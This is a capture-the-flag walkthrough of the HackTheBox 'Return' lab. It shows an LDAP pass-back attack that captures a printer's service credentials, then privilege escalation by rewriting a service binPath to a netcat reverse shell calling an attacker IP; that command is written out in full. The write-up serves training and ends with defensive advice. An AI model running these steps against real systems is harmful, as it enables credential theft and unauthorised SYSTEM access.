HackTheBox : Return

0liverFlow
7 min read · Dec 17, 2024


Return is a Windows machine whose network printer administration panel stores LDAP credentials. These credentials can be captured by pointing the panel at a rogue LDAP server, which gives us initial access to the server through WinRM. The compromised user is a member of a privileged group, which allows us to escalate our privileges to NT AUTHORITY\SYSTEM.

Reconnaissance

Nmap

As usual, let’s start with an nmap scan :

Nmap full tcp syn scan

We have several open TCP ports, such as 53, 88, 389, 636, 3268 and 5985. Based on that, we can conclude that the target machine is a Windows domain controller. Port 80 is also open, so let’s start our enumeration with that port and move on to the other protocols if we find nothing.

HTTP — TCP/80

In this section, we are going to enumerate the web server.

That said, let’s take a quick look at the main webpage :

Main Page

Great ! Let’s browse the other webpages to get a better understanding of the website’s features. When clicking on the Settings tab, I was redirected to the following page :

Printer Admin Panel

Interesting ! This is the printer admin panel page. Let’s see if we can retrieve the password by inspecting the source code :

Password not stored in the source code

Unfortunately, the LDAP password is not sent back to the browser, so we cannot retrieve it from the source code.

Well, let’s try to intercept the request with Burp after clicking on the Update button :

Intercepting POST request

As you can see, a POST request is sent to /settings.php with the IP address specified in the server address field.

So, what happens if we replace this IP address with ours ?

To answer this question, let’s give it a try :

Changing the initial IP with our IP address

After that, let’s run our netcat listener on port 389 :

Netcat is listening on port 389

Once done, we can forward the intercepted request to the server, and we should receive this beautiful response on our machine :

LDAP response

Taking a close look at the LDAP response, you can see a username, return\svc-printer, and another string, 1edFg43012!!, which might be svc-printer’s password. Well, let’s check whether this gets us initial access to the target system :

Authentication succeeded

The command is a one-liner I always use because it checks authentication against several protocols without having to run the command multiple times with a different protocol each time. Haha, the authentication succeeded.

The attack above is called an LDAP Pass-back attack. It is a common attack against network devices such as printers, and it can be performed whenever we gain access to a device’s configuration where the LDAP parameters are specified. In an LDAP Pass-back attack, we change the configured LDAP server IP to our own and then test the LDAP configuration, which forces the device (here the printer) to attempt an LDAP authentication against our machine. We can then intercept this authentication attempt to recover the LDAP credentials.
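To make clear why a plain netcat listener is enough to read the credentials, here is an added example (not part of the original writeup) that decodes the BER-encoded LDAPv3 simple BindRequest the printer sends on port 389. The sample message is constructed by hand to encode the values quoted above; the `read_tlv`, `parse_simple_bind` and `build_simple_bind` names are this example’s own.

```python
# Minimal BER decoder for an LDAPv3 simple BindRequest (RFC 4511).
# A simple bind carries the DN and password as raw OCTET STRINGs, so
# without TLS (LDAPS) any server the device is pointed at can read them.

def read_tlv(buf: bytes, pos: int) -> tuple:
    """Return (tag, value, next_pos) for the BER element starting at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def parse_simple_bind(msg: bytes) -> dict:
    """Decode LDAPMessage{messageID, BindRequest{version, name, simple}}."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:                       # LDAPMessage is a SEQUENCE
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, msg_id, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, bind, _ = read_tlv(body, pos)
    if tag != 0x60:                       # [APPLICATION 0] = BindRequest
        raise ValueError("protocolOp is not a BindRequest")
    tag, version, pos = read_tlv(bind, 0)
    tag, name, pos = read_tlv(bind, pos)
    tag, auth, _ = read_tlv(bind, pos)
    if tag != 0x80:                       # [0] simple; 0xA3 would be SASL
        raise ValueError("bind is not simple authentication")
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode(),
        "password": auth.decode(),        # plaintext on the wire without TLS
    }

def build_simple_bind(name: str, password: str, msg_id: int = 1) -> bytes:
    """Encode the same structure; used here only to construct the sample."""
    def tlv(tag: int, value: bytes) -> bytes:
        assert len(value) < 128           # short-form lengths are enough here
        return bytes([tag, len(value)]) + value
    bind = tlv(0x02, b"\x03") + tlv(0x04, name.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + tlv(0x60, bind))

# Constructed sample: the bind the printer would send to whatever host is configured.
SAMPLE_BIND = build_simple_bind("return\\svc-printer", "1edFg43012!!")
```

Running `parse_simple_bind(SAMPLE_BIND)` returns the DN and password fields exactly as a listener on 389 would see them, which is the whole reason the credentials should only ever travel over LDAPS.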

Let’s authenticate to the svc-printer account with evil-winrm :

Authenticating to svc-printer account

Fantastic ! Let’s retrieve the user flag :

user.txt flag

Post Exploitation

In this section, we will try to move laterally and escalate our privileges.

Let’s first download the domain information using bloodhound-python :

Collecting domain information

Once done, launch your neo4j database, then upload the domain information into BloodHound :

Launching neo4j

After that, I took a look at BloodHound’s pre-built analytics queries but found only this path :

Shortest paths to Domain Admins from owned principals

Nevertheless, this leads us nowhere, as we don’t have the printer machine account’s password.

After thinking for a while, I noticed that I had not performed the basic enumeration I usually do once I compromise a machine. So I went back to the target machine and did it :

Enumerating groups information
Enumerating privileges
Enumerating usernames
svc-printer’s info

As you can see, svc-printer is part of the Server Operators group. Let’s see who else is part of that group :

Enumerating users that belong to Server Operators group

svc-printer is the only user that belongs to that group.

The issue here is that Server Operators is a built-in privileged group that has no members by default. According to Microsoft documentation, members of the Server Operators group can take the following actions :

  • Format the hard drive of the computer
  • Shut down the computer
  • Create and delete network shared resources
  • Start and stop services
  • Back up and restore files

Well, let’s check whether there is a way to exploit this group membership :

After taking a look at this article, it seems that we can abuse this membership to escalate our privileges to SYSTEM.

Yeah, yeah, you got it right :)

To do that, we will first list the services running on the target machine, then change one service’s binary path :

Listing running services

Then, I decided to change VGAuthService’s binary path. To keep things simple, I will add svc-printer to the Domain Admins group :

Unfortunately, it did not work. Therefore, I tried another method using netcat : I uploaded a netcat binary to the target system, then tried to get a reverse shell by modifying a service’s binary path.

Note : On Kali Linux, you can find the netcat binary in /usr/share/windows-resources/binaries

Uploading nc on the target machine

Once done, let’s change the service’s binary path to our netcat reverse shell using the following command :

sc.exe config VGAuthService binPath="C:\Users\svc-printer\AppData\Local\Temp\nmd.exe 10.10.14.14 443"
Changing the binPath with our netcat reverse shell
Launching a netcat listener on our attacker machine
Stopping and starting VGAuthService service
Getting a shell as NT AUTHORITY\SYSTEM

Guess what ? We got a reverse shell as NT AUTHORITY\SYSTEM.

Let’s now retrieve the root flag. Shall we ?

root.txt flag

Key Techniques Used

Here are the key techniques covered in this box :

  • Performing an LDAP Pass-back attack by setting up a rogue LDAP server, then forcing the printer to authenticate to our server so that we can intercept the credentials.
  • Modifying a service’s binary path to point to our payload, then stopping and restarting the service to get a shell with the highest privileges.

Lessons Learned

1/ To get initial access to the target machine, we exploited a printer admin panel by performing an LDAP Pass-back attack. To prevent that, we recommend using an encrypted protocol such as LDAPS (with the device validating the server’s certificate) so that the bind credentials never cross the network in plaintext, and restricting who can edit the printer’s LDAP settings. For more information, refer here

2/ After getting a foothold, we escalated our privileges to NT AUTHORITY\SYSTEM by abusing our membership in the Server Operators group, a built-in privileged group on the domain. To address that, we recommend reviewing users’ group memberships and permissions and removing any unnecessary privileges.

3/ Last but not least, we also noticed a weak password policy, as shown in the image below. To address that, we recommend enforcing a strong password policy. For that, you can refer here

Weak password policy

Wrap Up

That’s it guys. Congrats on having made it so far 👏

I hope you enjoyed the writeup.

If so, do not forget to click on the little clap icon below and subscribe to my newsletter to keep up with my latest articles !

Last but not least, hack the planet 😎

Written by 0liverFlow

Pentester | Enjoy breaking and building stuffs
